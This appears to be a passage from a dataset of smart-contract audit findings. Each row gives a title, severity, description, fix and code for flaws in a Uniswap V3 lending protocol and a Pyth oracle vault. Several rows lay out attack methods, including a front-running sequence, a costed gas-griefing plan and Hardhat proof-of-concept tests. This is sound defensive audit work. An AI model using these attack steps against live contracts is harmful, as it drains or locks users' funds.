holdTokenAmountIn,\\n amountOutMinimum: (saleTokenAmountOut * params.slippageBP1000) /\\n Constants.BPS\\n })\\n```\\n" +Creditor can maliciously burn UniV3 position to permanently lock funds,high,"NonfungiblePositionManager\\n```\\nfunction ownerOf(uint256 tokenId) public view virtual override returns (address) {\\n return _tokenOwners.get(tokenId, ""ERC721: owner query for nonexistent token"");\\n}\\n```\\n\\nWhen querying a nonexistent token, ownerOf will revert. Now assuming the NFT is burnt we can see how every method for repayment is now lost.\\nLiquidityManager.sol#L306-L308\\n```\\n address creditor = underlyingPositionManager.ownerOf(loan.tokenId);\\n // Increase liquidity and transfer liquidity owner reward\\n _increaseLiquidity(cache.saleToken, cache.holdToken, loan, amount0, amount1);\\n```\\n\\nIf the user is being liquidated or repaying themselves the above lines are called for each loan. This causes all calls of this nature to revert.\\nLiquidityBorrowingManager.sol#L727-L732\\n```\\n for (uint256 i; i < loans.length; ) {\\n LoanInfo memory loan = loans[i];\\n // Get the owner address of the loan's token ID using the underlyingPositionManager contract.\\n address creditor = underlyingPositionManager.ownerOf(loan.tokenId);\\n // Check if the owner of the loan's token ID is equal to the `msg.sender`.\\n if (creditor == msg.sender) {\\n```\\n\\nThe only other option to recover funds would be for each of the other lenders to call for an emergency withdrawal. The problem is that this pathway will also always revert. It cycles through each loan causing it to query ownerOf() for each token. As we know this reverts. The final result is that once this happens, there is no way possible to close the position.","I would recommend storing each initial creditor when a loan is opened. Add try-catch blocks to each `ownerOf()` call. If the call reverts then use the initial creditor, otherwise use the current owner.",Creditor can maliciously lock all funds,"```\\nfunction ownerOf(uint256 tokenId) public view virtual override returns (address) {\\n return _tokenOwners.get(tokenId, ""ERC721: owner query for nonexistent token"");\\n}\\n```\\n" +No slippage protection during repayment due to dynamic slippage params and easily influenced `slot0()`,high,"The absence of slippage protection can be attributed to two key reasons. Firstly, the `sqrtPrice` is derived from `slot0()`, which can be easily manipulated:\\n```\\n function _getCurrentSqrtPriceX96(\\n bool zeroForA,\\n address tokenA,\\n address tokenB,\\n uint24 fee\\n ) private view returns (uint160 sqrtPriceX96) {\\n if (!zeroForA) {\\n (tokenA, tokenB) = (tokenB, tokenA);\\n }\\n address poolAddress = computePoolAddress(tokenA, tokenB, fee);\\n (sqrtPriceX96, , , , , , ) = IUniswapV3Pool(poolAddress).slot0(); //@audit-issue can be easily manipulated\\n }\\n```\\n\\nThe calculated `sqrtPriceX96` is used to determine the amounts for restoring liquidation and the number of holdTokens to be swapped for saleTokens:\\n```\\n(uint256 holdTokenAmountIn, uint256 amount0, uint256 amount1) = _getHoldTokenAmountIn(\\n params.zeroForSaleToken,\\n cache.tickLower,\\n cache.tickUpper,\\n cache.sqrtPriceX96,\\n loan.liquidity,\\n cache.holdTokenDebt\\n );\\n```\\n\\nAfter that, the number of `SaleTokemAmountOut` is gained based on the sqrtPrice via QuoterV2.\\nThen, the slippage params are calculated `amountOutMinimum: (saleTokenAmountOut * params.slippageBP1000) / Constants.BPS })` However, the `saleTokenAmountOut` is a dynamic number calculated on the current state of the blockchain, based on the calculations mentioned above. This will lead to the situation that the swap will always satisfy the `amountOutMinimum`.\\nAs a result, if the repayment of the user is sandwiched (frontrunned), the profit of the repayer is decreased till the repayment satisfies the restored liquidity.\\nA Proof of Concept (PoC) demonstrates the issue with comments. Although the swap does not significantly impact a strongly founded pool, it does result in a loss of a few dollars for the repayer.\\n```\\n let amountWBTC = ethers.utils.parseUnits(""0.05"", 8); //token0\\n const deadline = (await time.latest()) + 60;\\n const minLeverageDesired = 50;\\n const maxCollateralWBTC = amountWBTC.div(minLeverageDesired);\\n\\n const loans = [\\n {\\n liquidity: nftpos[3].liquidity,\\n tokenId: nftpos[3].tokenId,\\n },\\n ];\\n\\n const swapParams: ApproveSwapAndPay.SwapParamsStruct = {\\n swapTarget: constants.AddressZero,\\n swapAmountInDataIndex: 0,\\n maxGasForCall: 0,\\n swapData: swapData,\\n };\\n\\nlet params = {\\n internalSwapPoolfee: 500,\\n saleToken: WETH_ADDRESS,\\n holdToken: WBTC_ADDRESS,\\n minHoldTokenOut: amountWBTC,\\n maxCollateral: maxCollateralWBTC,\\n externalSwap: swapParams,\\n loans: loans,\\n };\\n\\nawait borrowingManager.connect(bob).borrow(params, deadline);\\n\\nconst borrowingKey = await borrowingManager.userBorrowingKeys(bob.address, 0);\\n const swapParamsRep: ApproveSwapAndPay.SwapParamsStruct = {\\n swapTarget: constants.AddressZero,\\n swapAmountInDataIndex: 0,\\n maxGasForCall: 0,\\n swapData: swapData,\\n };\\n\\n \\n amountWBTC = ethers.utils.parseUnits(""0.06"", 8); //token0\\n\\nlet swapping: ISwapRouter.ExactInputSingleParamsStruct = {\\n tokenIn: WBTC_ADDRESS,\\n tokenOut: WETH_ADDRESS,\\n fee: 500,\\n recipient: alice.address,\\n deadline: deadline,\\n amountIn: ethers.utils.parseUnits(""100"", 8),\\n amountOutMinimum: 0,\\n sqrtPriceLimitX96: 0\\n };\\n await router.connect(alice).exactInputSingle(swapping);\\n console.log(""Swap success"");\\n\\n let paramsRep: LiquidityBorrowingManager.RepayParamsStruct = {\\n isEmergency: false,\\n internalSwapPoolfee: 500,\\n externalSwap: swapParamsRep,\\n borrowingKey: borrowingKey,\\n swapSlippageBP1000: 990, //<=slippage simulated\\n };\\n await borrowingManager.connect(bob).repay(paramsRep, deadline);\\n // Without swap\\n// Balance of hold token after repay: BigNumber { value: ""993951415"" }\\n// Balance of sale token after repay: BigNumber { value: ""99005137946252426108"" }\\n// When swap\\n// Balance of hold token after repay: BigNumber { value: ""993951415"" }\\n// Balance of sale token after repay: BigNumber { value: ""99000233164653177505"" }\\n```\\n\\nThe following table shows difference of recieved sale token:\\nSwap before repay transaction Token Balance of user after Repay\\nNo WETH 99005137946252426108\\nYes WETH 99000233164653177505\\nThe difference in the profit after repayment is 4904781599248603 weis, which is at the current market price of around 8 USD. The profit loss will depend on the liquidity in the pool, which depends on the type of pool and related tokens.","To address this issue, avoid relying on slot0 and instead utilize Uniswap TWAP. Additionally, consider manually setting values for amountOutMin for swaps based on data acquired before repayment.",The absence of slippage protection results in potential profit loss for the repayer.,"```\\n function _getCurrentSqrtPriceX96(\\n bool zeroForA,\\n address tokenA,\\n address tokenB,\\n uint24 fee\\n ) private view returns (uint160 sqrtPriceX96) {\\n if (!zeroForA) {\\n (tokenA, tokenB) = (tokenB, tokenA);\\n }\\n address poolAddress = computePoolAddress(tokenA, tokenB, fee);\\n (sqrtPriceX96, , , , , , ) = IUniswapV3Pool(poolAddress).slot0(); //@audit-issue can be easily manipulated\\n }\\n```\\n" +DoS of lenders and gas griefing by packing tokenIdToBorrowingKeys arrays,medium,"`LiquidityBorrowingManager.borrow()` calls the function `_addKeysAndLoansInfo()`, which adds user keys to the `tokenIdToBorrowingKeys` array of the borrowed-from LP position:\\n```\\n function _addKeysAndLoansInfo(\\n bool update,\\n bytes32 borrowingKey,\\n LoanInfo[] memory sourceLoans\\n ) private {\\n // Get the storage reference to the loans array for the borrowing key\\n LoanInfo[] storage loans = loansInfo[borrowingKey];\\n // Iterate through the sourceLoans array\\n for (uint256 i; i < sourceLoans.length; ) {\\n // Get the current loan from the sourceLoans array\\n LoanInfo memory loan = sourceLoans[i];\\n // Get the storage reference to the tokenIdLoansKeys array for the loan's token ID\\n bytes32[] storage tokenIdLoansKeys = tokenIdToBorrowingKeys[loan.tokenId];\\n // Conditionally add or push the borrowing key to the tokenIdLoansKeys array based on the 'update' flag\\n update\\n ? tokenIdLoansKeys.addKeyIfNotExists(borrowingKey)\\n : tokenIdLoansKeys.push(borrowingKey);\\n // rest of code\\n```\\n\\nA user key is calculated in the `Keys` library like so:\\n```\\n function computeBorrowingKey(\\n address borrower,\\n address saleToken,\\n address holdToken\\n ) internal pure returns (bytes32) {\\n return keccak256(abi.encodePacked(borrower, saleToken, holdToken));\\n }\\n```\\n\\n```\\n function addKeyIfNotExists(bytes32[] storage self, bytes32 key) internal {\\n uint256 length = self.length;\\n for (uint256 i; i < length; ) {\\n if (self.unsafeAccess(i).value == key) {\\n return;\\n }\\n unchecked {\\n ++i;\\n }\\n }\\n self.push(key);\\n }\\n\\n function removeKey(bytes32[] storage self, bytes32 key) internal {\\n uint256 length = self.length;\\n for (uint256 i; i < length; ) {\\n if (self.unsafeAccess(i).value == key) {\\n self.unsafeAccess(i).value = self.unsafeAccess(length - 1).value;\\n self.pop();\\n break;\\n }\\n unchecked {\\n ++i;\\n }\\n }\\n }\\n```\\n\\nLet's give an example to see the potential impact and cost of the attack:\\nAn LP provider authorizes the contract to give loans from their large position. Let's say USDC/WETH pool.\\nThe attacker sees this and takes out minimum borrows of USDC using different addresses to pack the position's `tokenIdToBorrowingKeys` array. In `Constants.sol`, `MINIMUM_BORROWED_AMOUNT = 100000` so the minimum borrow is $0.1 dollars since USDC has 6 decimal places. Add this to the estimated gas cost of the borrow transaction, let's say $3.9 dollars. The cost to add one key to the array is approx. $4. The max block gas limit on ethereum mainnet is `30,000,000`, so divide that by 2000 gas, the approximate gas increase for one key added to the array. The result is 15,000, therefore the attacker can spend 60000 dollars to make any new borrows from the LP position unable to be repaid, transferred, or liquidated. Any new borrow will be stuck in the contract.\\nThe attacker now takes out a high leverage borrow on the LP position, for example $20,000 in collateral for a $1,000,000 borrow. The attacker's total expenditure is now $80,000, and the $1,000,000 from the LP is now locked in the contract for an arbitrary period of time.\\nThe attacker calls `increaseCollateralBalance()` on all of the spam positions. Default daily rate is .1% (max 1%), so over a year the attacker must pay 36.5% of each spam borrow amount to avoid liquidation and shortening of the array. If the gas cost of increasing collateral is $0.5 dollars, and the attacker spends another $0.5 dollars to increase collateral for each spam borrow, then the attacker can spend $1 on each spam borrow and keep them safe from liquidation for over 10 years for a cost of $15,000 dollars. The total attack expenditure is now $95,000. The protocol cannot easily increase the rate to hurt the attacker, because that would increase the rate for all users in the USDC/WETH market. Furthermore, the cost of the attack will not increase that much even if the daily rate is increased to the max of 1%. The attacker does not need to increase the collateral balance of the $1,000,000 borrow since repaying that borrow is DoSed.\\nThe result is that $1,000,000 of the loaner's liquidity is locked in the contract for over 10 years for an attack cost of $95,000.","`tokenIdToBorrowingKeys` tracks borrowing keys and is used in view functions to return info (getLenderCreditsCount() and getLenderCreditsInfo()). This functionality is easier to implement with arrays, but it can be done with mappings to reduce gas costs and prevent gas griefing and DoS attacks. For example the protocol can emit the borrows for all LP tokens and keep track of them offchain, and pass borrow IDs in an array to a view function to look them up in the mapping. Alternatively, OpenZeppelin's EnumerableSet library could be used to replace the array and keep track of all the borrows on-chain.",Array packing causes users to spend more gas on loans of the affected LP token. User transactions may out-of-gas revert due to increased gas costs. An attacker can lock liquidity from LPs in the contract for arbitrary periods of time for asymmetric cost favoring the attacker. The LP will earn very little fees over the period of the DoS.,"```\\n function _addKeysAndLoansInfo(\\n bool update,\\n bytes32 borrowingKey,\\n LoanInfo[] memory sourceLoans\\n ) private {\\n // Get the storage reference to the loans array for the borrowing key\\n LoanInfo[] storage loans = loansInfo[borrowingKey];\\n // Iterate through the sourceLoans array\\n for (uint256 i; i < sourceLoans.length; ) {\\n // Get the current loan from the sourceLoans array\\n LoanInfo memory loan = sourceLoans[i];\\n // Get the storage reference to the tokenIdLoansKeys array for the loan's token ID\\n bytes32[] storage tokenIdLoansKeys = tokenIdToBorrowingKeys[loan.tokenId];\\n // Conditionally add or push the borrowing key to the tokenIdLoansKeys array based on the 'update' flag\\n update\\n ? tokenIdLoansKeys.addKeyIfNotExists(borrowingKey)\\n : tokenIdLoansKeys.push(borrowingKey);\\n // rest of code\\n```\\n" +Adversary can overwrite function selector in _patchAmountAndCall due to inline assembly lack of overflow protection,medium,"`The use of YUL or inline assembly in a solidity smart contract also makes integer overflow/ underflow possible even if the compiler version of solidity is 0.8. In YUL programming language, integer underflow & overflow is possible in the same way as Solidity and it does not check automatically for it as YUL is a low-level language that is mostly used for making the code more optimized, which does this by omitting many opcodes. Because of its low-level nature, YUL does not perform many security checks therefore it is recommended to use as little of it as possible in your smart contracts.`\\nSource\\nInline assembly lacks overflow/underflow protections, which opens the possibility of this exploit.\\nExternalCall.sol#L27-L38\\n```\\n if gt(swapAmountInDataValue, 0) {\\n mstore(add(add(ptr, 0x24), mul(swapAmountInDataIndex, 0x20)), swapAmountInDataValue)\\n }\\n success := call(\\n maxGas,\\n target,\\n 0, //value\\n ptr, //Inputs are stored at location ptr\\n data.length,\\n 0,\\n 0\\n )\\n```\\n\\nIn the code above we see that `swapAmountInDataValue` is stored at `ptr + 36 (0x24) + swapAmountInDataIndex * 32 (0x20)`. The addition of 36 (0x24) in this scenario should prevent the function selector from being overwritten because of the extra 4 bytes (using 36 instead of 32). This is not the case though because `mul(swapAmountInDataIndex, 0x20)` can overflow since it is a uint256. This allows the attacker to target any part of the memory they choose by selectively overflowing to make it write to the desired position.\\nAs shown above, overwriting the function selector is possible although most of the time this value would be a complete nonsense since swapAmountInDataValue is calculated elsewhere and isn't user supplied. This also has a work around. By creating their own token and adding it as LP to a UniV3 pool, swapAmountInDataValue can be carefully manipulated to any value. This allows the attacker to selectively overwrite the function selector with any value they chose. This bypasses function selectors restrictions and opens calls to dangerous functions.","Limit `swapAmountInDataIndex` to a reasonable value such as uint128.max, preventing any overflow.",Attacker can bypass function restrictions and call dangerous/unintended functions,"```\\n if gt(swapAmountInDataValue, 0) {\\n mstore(add(add(ptr, 0x24), mul(swapAmountInDataIndex, 0x20)), swapAmountInDataValue)\\n }\\n success := call(\\n maxGas,\\n target,\\n 0, //value\\n ptr, //Inputs are stored at location ptr\\n data.length,\\n 0,\\n 0\\n )\\n```\\n" +Blacklisted creditor can block all repayment besides emergency closure,medium,"```\\n address creditor = underlyingPositionManager.ownerOf(loan.tokenId);\\n // Increase liquidity and transfer liquidity owner reward\\n _increaseLiquidity(cache.saleToken, cache.holdToken, loan, amount0, amount1);\\n uint256 liquidityOwnerReward = FullMath.mulDiv(\\n params.totalfeesOwed,\\n cache.holdTokenDebt,\\n params.totalBorrowedAmount\\n ) / Constants.COLLATERAL_BALANCE_PRECISION;\\n\\n Vault(VAULT_ADDRESS).transferToken(cache.holdToken, creditor, liquidityOwnerReward);\\n```\\n\\nThe following code is executed for each loan when attempting to repay. Here we see that each creditor is directly transferred their tokens from the vault. If the creditor is blacklisted for holdToken, then the transfer will revert. This will cause all repayments to revert, preventing the user from ever repaying their loan and forcing them to default.","Create an escrow to hold funds in the event that the creditor cannot receive their funds. Implement a try-catch block around the transfer to the creditor. If it fails then send the funds instead to an escrow account, allowing the creditor to claim their tokens later and for the transaction to complete.",Borrowers with blacklisted creditors are forced to default,"```\\n address creditor = underlyingPositionManager.ownerOf(loan.tokenId);\\n // Increase liquidity and transfer liquidity owner reward\\n _increaseLiquidity(cache.saleToken, cache.holdToken, loan, amount0, amount1);\\n uint256 liquidityOwnerReward = FullMath.mulDiv(\\n params.totalfeesOwed,\\n cache.holdTokenDebt,\\n params.totalBorrowedAmount\\n ) / Constants.COLLATERAL_BALANCE_PRECISION;\\n\\n Vault(VAULT_ADDRESS).transferToken(cache.holdToken, creditor, liquidityOwnerReward);\\n```\\n" +Incorrect calculations of borrowingCollateral leads to DoS for positions in the current tick range due to underflow,medium,"This calculation is most likely to underflow\\n```\\nuint256 borrowingCollateral = cache.borrowedAmount - cache.holdTokenBalance;\\n```\\n\\nThe `cache.borrowedAmount` is the calculated amount of holdTokens based on the liquidity of a position. `cache.holdTokenBalance` is the balance of holdTokens queried after liquidity extraction and tokens transferred to the `LiquidityBorrowingManager`. If any amounts of the saleToken are transferred as well, these are swapped to holdTokens and added to `cache.holdTokenBalance`.\\nSo in case when liquidity of a position is in the current tick range, both tokens would be transferred to the contract and saleToken would be swapped for holdToken and then added to `cache.holdTokenBalance`. This would make `cache.holdTokenBalance > cache.borrowedAmount` since `cache.holdTokenBalance == cache.borrowedAmount + amount of sale token swapped` and would make the tx revert due to underflow.",The borrowedAmount should be subtracted from holdTokenBalance\\n```\\nuint256 borrowingCollateral = cache.holdTokenBalance - cache.borrowedAmount;\\n```\\n,Many positions would be unavailable to borrowers. For non-volatile positions like that which provide liquidity to stablecoin pools the DoS could last for very long period. For volatile positions that provide liquidity in a wide range this could also be for more than 1 year.,```\\nuint256 borrowingCollateral = cache.borrowedAmount - cache.holdTokenBalance;\\n```\\n +Wrong `accLoanRatePerSeconds` in `repay()` can lead to underflow,medium,"Because the `repay()` function resets the `dailyRateCollateralBalance` to 0 when the lender call didn't fully close the position. We want to be able to compute the missing collateral again.\\nTo do so we substract the percentage of collateral not paid to the `accLoanRatePerSeconds` so on the next call we will be adding extra second of fees that will allow the contract to compute the missing collateral.\\nThe problem lies in the fact that we compute a percentage using the borrowed amount left instead of the initial borrow amount causing the percentage to be higher. In practice this do allows the contract to recompute the missing collateral.\\nBut in the case of the missing `collateralBalance` or `removedAmt` being very high (ex: multiple days not paid or the loan removed was most of the position's liquidity) we might end up with a percentage higher than the `accLoanRatePerSeconds` which will cause an underflow.\\nIn case of an underflow the call will revert and the lender will not be able to get his tokens back.\\nConsider this POC that can be copied and pasted in the test files (replace all tests and just keep the setup & NFT creation):\\n```\\nit(""Updated accRate is incorrect"", async () => {\\n const amountWBTC = ethers.utils.parseUnits(""0.05"", 8); //token0\\n let deadline = (await time.latest()) + 60;\\n const minLeverageDesired = 50;\\n const maxCollateralWBTC = amountWBTC.div(minLeverageDesired);\\n\\n const loans = [\\n {\\n liquidity: nftpos[3].liquidity,\\n tokenId: nftpos[3].tokenId,\\n },\\n {\\n liquidity: nftpos[5].liquidity,\\n tokenId: nftpos[5].tokenId,\\n },\\n ];\\n\\n const swapParams: ApproveSwapAndPay.SwapParamsStruct = {\\n swapTarget: constants.AddressZero,\\n swapAmountInDataIndex: 0,\\n maxGasForCall: 0,\\n swapData: swapData,\\n };\\n\\n const borrowParams = {\\n internalSwapPoolfee: 500,\\n saleToken: WETH_ADDRESS,\\n holdToken: WBTC_ADDRESS,\\n minHoldTokenOut: amountWBTC,\\n maxCollateral: maxCollateralWBTC,\\n externalSwap: swapParams,\\n loans: loans,\\n };\\n\\n //borrow tokens\\n await borrowingManager.connect(bob).borrow(borrowParams, deadline);\\n\\n await time.increase(3600 * 72); //72h so 2 days of missing collateral\\n deadline = (await time.latest()) + 60;\\n\\n const borrowingKey = await borrowingManager.userBorrowingKeys(bob.address, 0);\\n\\n let repayParams = {\\n isEmergency: true,\\n internalSwapPoolfee: 0,\\n externalSwap: swapParams,\\n borrowingKey: borrowingKey,\\n swapSlippageBP1000: 0,\\n };\\n\\n const oldBorrowingInfo = await borrowingManager.borrowingsInfo(borrowingKey);\\n const dailyRateCollateral = await borrowingManager.checkDailyRateCollateral(borrowingKey);\\n\\n //Alice emergency repay but it reverts with 2 days of collateral missing\\n await expect(borrowingManager.connect(alice).repay(repayParams, deadline)).to.be.revertedWithPanic();\\n });\\n```\\n","Consider that when a lender do an emergency liquidity restoration they give up on their collateral missing and so use the initial amount in the computation instead of borrowed amount left.\\n```\\nborrowingStorage.accLoanRatePerSeconds =\\n holdTokenRateInfo.accLoanRatePerSeconds -\\n FullMath.mulDiv(\\n uint256(-collateralBalance),\\n Constants.BP,\\n borrowing.borrowedAmount + removedAmt //old amount\\n );\\n```\\n",Medium. Lender might not be able to use `isEmergency` on `repay()` and will have to do a normal liquidation if he want his liquidity back.,"```\\nit(""Updated accRate is incorrect"", async () => {\\n const amountWBTC = ethers.utils.parseUnits(""0.05"", 8); //token0\\n let deadline = (await time.latest()) + 60;\\n const minLeverageDesired = 50;\\n const maxCollateralWBTC = amountWBTC.div(minLeverageDesired);\\n\\n const loans = [\\n {\\n liquidity: nftpos[3].liquidity,\\n tokenId: nftpos[3].tokenId,\\n },\\n {\\n liquidity: nftpos[5].liquidity,\\n tokenId: nftpos[5].tokenId,\\n },\\n ];\\n\\n const swapParams: ApproveSwapAndPay.SwapParamsStruct = {\\n swapTarget: constants.AddressZero,\\n swapAmountInDataIndex: 0,\\n maxGasForCall: 0,\\n swapData: swapData,\\n };\\n\\n const borrowParams = {\\n internalSwapPoolfee: 500,\\n saleToken: WETH_ADDRESS,\\n holdToken: WBTC_ADDRESS,\\n minHoldTokenOut: amountWBTC,\\n maxCollateral: maxCollateralWBTC,\\n externalSwap: swapParams,\\n loans: loans,\\n };\\n\\n //borrow tokens\\n await borrowingManager.connect(bob).borrow(borrowParams, deadline);\\n\\n await time.increase(3600 * 72); //72h so 2 days of missing collateral\\n deadline = (await time.latest()) + 60;\\n\\n const borrowingKey = await borrowingManager.userBorrowingKeys(bob.address, 0);\\n\\n let repayParams = {\\n isEmergency: true,\\n internalSwapPoolfee: 0,\\n externalSwap: swapParams,\\n borrowingKey: borrowingKey,\\n swapSlippageBP1000: 0,\\n };\\n\\n const oldBorrowingInfo = await borrowingManager.borrowingsInfo(borrowingKey);\\n const dailyRateCollateral = await borrowingManager.checkDailyRateCollateral(borrowingKey);\\n\\n //Alice emergency repay but it reverts with 2 days of collateral missing\\n await expect(borrowingManager.connect(alice).repay(repayParams, deadline)).to.be.revertedWithPanic();\\n });\\n```\\n" +Borrower collateral that they are owed can get stuck in Vault and not sent back to them after calling `repay`,medium,"First, let's say that a borrower called `borrow` in `LiquidityBorrowingManager`. Then, they call increase `increaseCollateralBalance` with a large collateral amount. A short time later, they decide they want to `repay` so they call `repay`.\\nIn `repay`, we have the following code:\\n```\\n if (\\n collateralBalance > 0 &&\\n (currentFees + borrowing.feesOwed) / Constants.COLLATERAL_BALANCE_PRECISION >\\n Constants.MINIMUM_AMOUNT\\n ) {\\n liquidationBonus +=\\n uint256(collateralBalance) /\\n Constants.COLLATERAL_BALANCE_PRECISION;\\n } else {\\n currentFees = borrowing.dailyRateCollateralBalance;\\n }\\n```\\n\\nNotice that if we have `collateralBalance > 0` BUT `!((currentFees + borrowing.feesOwed) / Constants.COLLATERAL_BALANCE_PRECISION > Constants.MINIMUM_AMOUNT)` (i.e. the first part of the if condition is fine but the second is not. It makes sense the second part is not fine because the borrower is repaying not long after they borrowed, so fees haven't had a long time to accumulate), then we will still go to `currentFees = borrowing.dailyRateCollateralBalance;` but we will not do:\\n```\\n liquidationBonus +=\\n uint256(collateralBalance) /\\n Constants.COLLATERAL_BALANCE_PRECISION;\\n```\\n\\nHowever, later on in the code, we have:\\n```\\n Vault(VAULT_ADDRESS).transferToken(\\n borrowing.holdToken,\\n address(this),\\n borrowing.borrowedAmount + liquidationBonus\\n );\\n```\\n\\nSo, the borrower's collateral will actually not even be sent back to the LiquidityBorrowingManager from the Vault (since we never incremented liquidationBonus). We later do:\\n```\\n _pay(borrowing.holdToken, address(this), msg.sender, holdTokenBalance);\\n _pay(borrowing.saleToken, address(this), msg.sender, saleTokenBalance);\\n```\\n\\nSo clearly the user will not receive their collateral back.","You should separate:\\n```\\n if (\\n collateralBalance > 0 &&\\n (currentFees + borrowing.feesOwed) / Constants.COLLATERAL_BALANCE_PRECISION >\\n Constants.MINIMUM_AMOUNT\\n ) {\\n liquidationBonus +=\\n uint256(collateralBalance) /\\n Constants.COLLATERAL_BALANCE_PRECISION;\\n } else {\\n currentFees = borrowing.dailyRateCollateralBalance;\\n }\\n```\\n\\nInto two separate if statements. One should check if `collateralBalance > 0`, and if so, increment liquidationBonus. The other should check `(currentFees + borrowing.feesOwed) / Constants.COLLATERAL_BALANCE_PRECISION > Constants.MINIMUM_AMOUNT` and if not, set `currentFees = borrowing.dailyRateCollateralBalance;`.",User's collateral will be stuck in Vault when it should be sent back to them. This could be a large amount of funds if for example `increaseCollateralBalance` is called first.,```\\n if (\\n collateralBalance > 0 &&\\n (currentFees + borrowing.feesOwed) / Constants.COLLATERAL_BALANCE_PRECISION >\\n Constants.MINIMUM_AMOUNT\\n ) {\\n liquidationBonus +=\\n uint256(collateralBalance) /\\n Constants.COLLATERAL_BALANCE_PRECISION;\\n } else {\\n currentFees = borrowing.dailyRateCollateralBalance;\\n }\\n```\\n +commitRequested() front-run malicious invalid oralce,medium,"Execution of the `commitRequested()` method restricts the `lastCommittedPublishTime` from going backward.\\n```\\n function commitRequested(uint256 versionIndex, bytes calldata updateData)\\n public\\n payable\\n keep(KEEPER_REWARD_PREMIUM, KEEPER_BUFFER, updateData, """")\\n {\\n// rest of code\\n\\n if (pythPrice.publishTime <= lastCommittedPublishTime) revert PythOracleNonIncreasingPublishTimes();\\n lastCommittedPublishTime = pythPrice.publishTime;\\n// rest of code\\n```\\n\\n`commit()` has a similar limitation and can set `lastCommittedPublishTime`.\\n```\\n function commit(uint256 versionIndex, uint256 oracleVersion, bytes calldata updateData) external payable {\\n if (\\n versionList.length > versionIndex && // must be a requested version\\n versionIndex >= nextVersionIndexToCommit && // must be the next (or later) requested version\\n oracleVersion == versionList[versionIndex] // must be the corresponding timestamp\\n ) {\\n commitRequested(versionIndex, updateData);\\n return;\\n }\\n// rest of code\\n if (pythPrice.publishTime <= lastCommittedPublishTime) revert PythOracleNonIncreasingPublishTimes();\\n lastCommittedPublishTime = pythPrice.publishTime;\\n// rest of code.\\n```\\n\\nThis leads to a situation where anyone can front-run `commitRequested()` and use his `updateData` to execute `commit()`. In order to satisfy the `commit()` constraint, we need to pass a `commit()` parameter set as follows\\nversionIndex= nextVersionIndexToCommit\\noracleVersion = versionList[versionIndex] - 1 and oralceVersion > _latestVersion\\npythPrice.publishTime >= versionList[versionIndex] - 1 + MIN_VALID_TIME_AFTER_VERSION\\nThis way `lastCommittedPublishTime` will be modified, causing `commitRequested()` to execute with `revert PythOracleNonIncreasingPublishTimes`\\nExample: Given: nextVersionIndexToCommit = 10 versionList[10] = 200\\n_latestVersion = 100\\nwhen:\\nkeeper exexute commitRequested(versionIndex = 10 , VAA{ publishTime = 205})\\nfront-run execute `commit(versionIndex = 10 , oracleVersion = 200-1 , VAA{ publishTime = 205})\\nversionIndex= nextVersionIndexToCommit (pass)\\noracleVersion = versionList[versionIndex] - 1 and oralceVersion > _latestVersion (pass)\\npythPrice.publishTime >= versionList[versionIndex] - 1 + MIN_VALID_TIME_AFTER_VERSION (pass)\\nBy the time the `keeper` submits the next VVA, the price may have passed its expiration date","check `pythPrice` whether valid for `nextVersionIndexToCommit`\\n```\\n function commit(uint256 versionIndex, uint256 oracleVersion, bytes calldata updateData) external payable {\\n // Must be before the next requested version to commit, if it exists\\n // Otherwise, try to commit it as the next request version to commit\\n if (\\n versionList.length > versionIndex && // must be a requested version\\n versionIndex >= nextVersionIndexToCommit && // must be the next (or later) requested version\\n oracleVersion == versionList[versionIndex] // must be the corresponding timestamp\\n ) {\\n commitRequested(versionIndex, updateData);\\n return;\\n }\\n\\n PythStructs.Price memory pythPrice = _validateAndGetPrice(oracleVersion, updateData);\\n\\n // Price must be more recent than that of the most recently committed version\\n if (pythPrice.publishTime <= lastCommittedPublishTime) revert PythOracleNonIncreasingPublishTimes();\\n lastCommittedPublishTime = pythPrice.publishTime;\\n\\n // Oracle version must be more recent than that of the most recently committed version\\n uint256 minVersion = _latestVersion;\\n uint256 maxVersion = versionList.length > versionIndex ? versionList[versionIndex] : current();\\n\\n if (versionIndex < nextVersionIndexToCommit) revert PythOracleVersionIndexTooLowError();\\n if (versionIndex > nextVersionIndexToCommit && block.timestamp <= versionList[versionIndex - 1] // Add the line below\\n GRACE_PERIOD)\\n revert PythOracleGracePeriodHasNotExpiredError();\\n if (oracleVersion <= minVersion || oracleVersion >= maxVersion) revert PythOracleVersionOutsideRangeError();\\n// Add the line below\\n if (nextVersionIndexToCommit < versionList.length) {\\n// Add the line below\\n if (\\n// Add the line below\\n pythPrice.publishTime >= versionList[nextVersionIndexToCommit] // Add the line below\\n MIN_VALID_TIME_AFTER_VERSION &&\\n// Add the line below\\n pythPrice.publishTime <= versionList[nextVersionIndexToCommit] // Add the line below\\n MAX_VALID_TIME_AFTER_VERSION\\n// Add the line below\\n ) revert PythOracleUpdateValidForPreviousVersionError();\\n// Add the line below\\n }\\n\\n\\n _recordPrice(oracleVersion, pythPrice);\\n nextVersionIndexToCommit = versionIndex;\\n _latestVersion = oracleVersion;\\n }\\n```\\n","If the user can control the oralce invalidation, it can lead to many problems e.g. invalidating `oracle` to one's own detriment, not having to take losses Maliciously destroying other people's profits, etc.","```\\n function commitRequested(uint256 versionIndex, bytes calldata updateData)\\n public\\n payable\\n keep(KEEPER_REWARD_PREMIUM, KEEPER_BUFFER, updateData, """")\\n {\\n// rest of code\\n\\n if (pythPrice.publishTime <= lastCommittedPublishTime) revert PythOracleNonIncreasingPublishTimes();\\n lastCommittedPublishTime = pythPrice.publishTime;\\n// rest of code\\n```\\n" +"`Vault.update(anyUser,0,0,0)` can be called for free to increase `checkpoint.count` and pay smaller keeper fee than necessary",medium,"`Vault._update(user, 0, 0, 0)` will pass all invariants checks:\\n```\\n// invariant\\n// @audit operator - pass\\nif (msg.sender != account && !IVaultFactory(address(factory())).operators(account, msg.sender))\\n revert VaultNotOperatorError();\\n// @audit 0,0,0 is single-sided - pass\\nif (!depositAssets.add(redeemShares).add(claimAssets).eq(depositAssets.max(redeemShares).max(claimAssets)))\\n revert VaultNotSingleSidedError();\\n// @audit depositAssets == 0 - pass\\nif (depositAssets.gt(_maxDeposit(context)))\\n revert VaultDepositLimitExceededError();\\n// @audit redeemShares == 0 - pass\\nif (redeemShares.gt(_maxRedeem(context)))\\n revert VaultRedemptionLimitExceededError();\\n// @audit depositAssets == 0 - pass\\nif (!depositAssets.isZero() && depositAssets.lt(context.settlementFee))\\n revert VaultInsufficientMinimumError();\\n// @audit redeemShares == 0 - pass\\nif (!redeemShares.isZero() && context.latestCheckpoint.toAssets(redeemShares, context.settlementFee).isZero())\\n revert VaultInsufficientMinimumError();\\n// @audit since this will be called by **different** users in the same epoch, this will also pass\\nif (context.local.current != context.local.latest) 